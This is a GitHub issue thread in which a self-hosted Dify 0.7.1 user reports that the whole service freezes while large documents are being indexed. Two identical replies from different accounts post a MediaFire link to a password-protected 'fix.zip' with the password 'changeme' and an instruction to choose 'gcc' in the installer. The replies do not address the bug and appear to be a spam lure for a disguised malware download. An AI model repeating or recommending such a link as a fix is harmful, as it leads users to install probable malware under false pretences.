### ISSUE TITLE
When the document is indexed, it will cause service lag

### ISSUE THREAD

**Issue by Lxx-c** [langgenius/dify#7650]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.7.1

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

When uploading documents for indexing, the entire Dify service will freeze during the indexing process, especially when the document content is large. Is there any better solution? I have tried to increase the number of processes, but there is no obvious effect. If the freeze is caused by indexing, since the woker service is related to document indexing, can it be deployed separately on other machines? All my services are deployed on one server, and the server configuration is 8c32G.I hope to get a reply!

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
